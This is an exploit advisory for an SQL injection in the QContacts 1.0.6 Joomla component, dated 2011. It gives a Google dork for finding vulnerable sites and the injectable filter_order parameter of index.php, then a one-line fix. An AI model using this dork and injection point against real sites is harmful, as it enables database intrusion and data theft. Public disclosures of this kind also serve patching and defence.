23 lines
724 B
Text
Executable file
23 lines
724 B
Text
Executable file
############################################################################
|
|
# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*
|
|
# Google Dork: inurl:"/components/com_qcontacts/"
|
|
# Date: Decembar/08/2011
|
|
# Author: Don (BalcanCrew & BalcanHack)
|
|
# Software Link: *
|
|
http://www.latenight-coding.com/joomla-addons/qcontacts.html*
|
|
# Version: 1.0.6
|
|
# Tested on: Apache
|
|
############################################################################
|
|
|
|
Vulnerability:
|
|
This vulnerability affects /index.php
|
|
|
|
*
|
|
/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
|
|
*
|
|
|
|
|
|
How to fix this vulnerability:
|
|
*Filter metacharacters from user input.*
|
|
|
|
*~Don 2011*
|